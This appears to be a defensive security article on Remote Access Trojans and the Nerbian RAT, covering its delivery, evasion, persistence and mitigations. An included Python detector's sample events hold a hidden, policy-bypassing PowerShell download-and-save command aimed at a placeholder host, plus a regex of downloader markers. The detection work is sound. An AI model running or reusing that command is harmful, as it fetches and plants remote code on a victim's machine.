Illness And War: The Spread of the Nerbian RAT

Like the Greek soldiers hidden in the wooden horse at Troy, a Trojan conceals an attack inside a legitimate-seeming file. Many Trojan infections begin with an unsuspecting victim downloading and running that file. Once it executes with the victim's privileges, the attacker gains whatever access that user has on the device, and a foothold from which to reach anything the device connects to.

However, malware has come a long way since its 1975 roots. Even basic antivirus software can scan a traditional Trojan and recognize the hidden behaviour behind its innocent-looking exterior.

Enter the next-generation Remote Access Trojan: capable of evading researchers, hiding from antivirus, and even reinstalling itself once deleted. What is a Remote Access Trojan (RAT), and what can you do against it?

Trojan Horse vs. Modern RAT

A Remote Access Trojan (RAT) is a Trojan whose payload is a remote-control backdoor. Because traditional Trojans are comparatively easy to capture, contain and eradicate, a successful RAT concentrates on quietly opening a backdoor into an otherwise secure device and keeping it open.

The goal is administrative control over your computer. RATs usually arrive in the traditional Trojan format, packaged with an apparently legitimate program or document. Once run, the initial file triggers a chain of stages that deploy the malicious payload and connect it back to the attacker's command-and-control (C2) server.

Once this channel is established, an attacker can move quietly around the device, using it to distribute further RATs, enrol it in a botnet, or exfiltrate sensitive data and extort your organization.

The RAT's Role in Cyber Warfare

Thanks to the relative ease with which they spread and their aptitude for stealth, RATs have seen significant use in political and military espionage, notably by Russian-linked groups. In December 2015, attackers took down part of the Ukrainian power grid, cutting electricity to more than 200,000 customers for up to six hours. The attack was complex and multifaceted, but its initial access came through a Trojanised Office document: spear-phishing emails carried documents whose macros installed remote-access malware (BlackEnergy), giving the attackers a foothold in the utilities' networks.

RATs have resurfaced in the current Russia-Ukraine conflict, used both inside the conflict zone and against Ukraine's supporters around the world. WhisperGate, a destructive wiper that poses as ransomware but overwrites the master boot record and corrupts files beyond recovery, was deployed against Ukrainian government and non-profit organizations, with RATs hosted on attacker-controlled sites serving as one delivery route.

Ukraine's supporters have also been targeted directly. In one campaign, a German-language site was set up promising fresh intelligence on the conflict. Visitors were offered a free information pack in a file named "2022-Q2-Bedrohungslage-Ukraine" ("2022-Q2-Threat-Situation-Ukraine"). The site claimed the pack was constantly updated and urged users to download a fresh copy every day, which gave the attackers repeated opportunities to push new payloads.

To bypass the Windows Antimalware Scan Interface (AMSI), the payload was kept encrypted and decrypted in memory at run time by a function literally named "bypass". With the RAT running, the attacker could remotely deploy a keylogger and take full control of the device.

The New Nerbian RAT

The Nerbian RAT is a newly documented Trojan that relies on social engineering for delivery. It arrives by email impersonating the World Health Organization (WHO), which is apparently sending the recipient Covid-19 safety information as an attached Word document.

The Word document is more than meets the eye: it is laced with malicious macro code. If the user opens the attachment and Office has content (macros) enabled, the macro drops a batch file that launches a PowerShell command, which in turn downloads and installs a dropper on the device. The RAT now has its foothold.
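The chain described above (Office document, batch file, PowerShell, downloader) leaves a distinctive parent-child trail in process-creation telemetry. The following Python is an added detection example, not code from the Nerbian report or from this page's authors. It runs over constructed Sysmon-style events (the pids, paths, script names and URL are placeholders, not real indicators) and flags any script host whose ancestry leads back to an Office application, raising the severity when the command line also carries download or hiding indicators.

```python
"""Flag the Office -> batch -> PowerShell -> download chain in process events.

Added example, not from the Nerbian RAT report. The events below are
constructed in a Sysmon Event ID 1 style (pid, ppid, image, command line);
the file names and URL are placeholders, not real indicators of compromise.
"""
import re

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe",
                "cscript.exe", "mshta.exe"}
# Command-line fragments typical of a downloader stage or a hidden window.
DOWNLOAD_MARKERS = re.compile(
    r"downloadfile|downloadstring|invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b|"
    r"net\.webclient|start-bitstransfer|bitsadmin|-enc(odedcommand)?\b|hidden",
    re.IGNORECASE,
)

# Constructed sample events (not real telemetry). pid 700 is a benign
# admin script launched from Explorer and must not be flagged.
SAMPLE_EVENTS = [
    {"pid": 400, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"pid": 512, "ppid": 400,
     "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmd": '"WINWORD.EXE" /n "C:\\Users\\ann\\Downloads\\covid_update.docm"'},
    {"pid": 600, "ppid": 512, "image": r"C:\Windows\System32\cmd.exe",
     "cmd": 'cmd.exe /c "C:\\Users\\ann\\AppData\\Local\\Temp\\update.bat"'},
    {"pid": 620, "ppid": 600,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell.exe -w hidden -ep bypass -c \"(New-Object Net.WebClient)"
            ".DownloadFile('http://example.invalid/u.exe','$env:TEMP\\u.exe')\""},
    {"pid": 700, "ppid": 400,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell.exe -File C:\\scripts\\inventory.ps1"},
]


def basename(path: str) -> str:
    """Lower-cased file name of a Windows image path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def office_ancestor(event: dict, by_pid: dict, max_depth: int = 4):
    """Walk the parent chain (at most max_depth hops) and return the first
    Office process found, or None. Real telemetry should key on a process
    GUID rather than a reusable pid; pids are used here for brevity."""
    current = by_pid.get(event["ppid"])
    for _ in range(max_depth):
        if current is None:
            return None
        if basename(current["image"]) in OFFICE_APPS:
            return current
        current = by_pid.get(current["ppid"])
    return None


def detect(events: list) -> list:
    """Return one finding per script host descended from an Office process.
    Severity is 'high' when the command line also shows download/hiding
    markers, 'medium' for a bare script host under Office."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        name = basename(e["image"])
        if name not in SCRIPT_HOSTS:
            continue
        office = office_ancestor(e, by_pid)
        if office is None:
            continue
        suspicious_cmd = bool(DOWNLOAD_MARKERS.search(e["cmd"]))
        findings.append({
            "pid": e["pid"],
            "image": name,
            "office_parent": basename(office["image"]),
            "severity": "high" if suspicious_cmd else "medium",
            "cmd": e["cmd"],
        })
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"[{f['severity']}] pid={f['pid']} {f['office_parent']} -> "
              f"{f['image']}: {f['cmd']}")
```

Run against the sample, this flags the cmd.exe spawned by Word as medium and the PowerShell downloader beneath it as high, while leaving the Explorer-launched admin script alone. The ancestry walk matters because the macro does not call PowerShell directly; it goes through the batch file, so a rule that only looks at the immediate parent would miss the download stage.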

From here, the RAT logs the user's keystrokes and captures on-screen content. The malware is written in Go, which compiles for many platforms, although the observed payloads target 64-bit Windows. Stolen data travels to the command-and-control server over TLS, so network scanning tools that rely on inspecting plaintext payloads cannot read the exchange; the connection itself, however, remains visible to flow-level monitoring.

Sometimes you can feel that a device is suffering from a Trojan: it slows down, or odd programs appear on disk or in Task Manager. The Nerbian RAT is built to avoid giving such cues, and to frustrate analysis as well.

Detection evasion and anti-analysis are a heavy focus of this RAT's code. Each stage of the attack chain carries an unassuming file name, and a rich arsenal of anti-analysis checks prolongs the window before this novel RAT is added to anti-malware signature databases.

For example, one part of the RAT checks whether it is running inside a virtual machine. Cybersecurity researchers use VMs to analyze new strains of malware and build defenses against them. The Nerbian RAT looks for common signposts of an analysis environment: reverse-engineering tools such as decompilers or debuggers present on the system, or a hard disk whose name contains "virtual". If any are found, it simply does not run.

Furthermore, even if a user finds and deletes the Nerbian keylogger and screen recorder, the downloader maintains persistence. Every hour it checks whether the main payloads are still in place and, if not, simply re-downloads them. Removing the payloads without also removing the downloader, and whatever mechanism relaunches it, therefore buys nothing.

RAT Extermination

Because RATs are built to avoid detection, they are difficult for the average user to identify. It is therefore important to block the attack vectors before a Trojan becomes an issue.

Educate your team on how to identify phishing emails, and support their efforts with automated phishing-prevention software. Since Nerbian relies on Office macros, blocking macros in documents from the internet through Office policy removes its initial foothold.

Trojans can quickly snowball into an ever-greater security nightmare. Thanks to its keylogging capabilities, a RAT is particularly efficient at compromising accounts. It is therefore essential that passwords are unique to each account, and that multi-factor authentication is enabled wherever possible; otherwise the destructive potential of even a single RAT can rapidly spiral.

It goes without saying that any malware found on a device should be removed immediately, but this is especially true for RATs. The longer one remains, the more time an attacker has to install further malware, exfiltrate confidential data, or collect and compromise more user accounts.

Isolating the device from the network cuts the RAT off from its command-and-control server, which needs that connection to issue commands and receive stolen data, and gives a comprehensive anti-malware tool time to dig out every malicious file. Blocking that communication in the first place is a job for egress filtering: a firewall or secure web proxy that denies outbound connections to unknown or flagged destinations. A web application firewall, which inspects inbound requests to your own web applications, does not address outbound C2 traffic.

Unfortunately, most users have no way to know what data the attacker accessed. Because of this, always reset every password after the malware is removed: change every credential used from that device, revoke active sessions and tokens where the service allows it, and keep a close eye on associated personal accounts going forward.
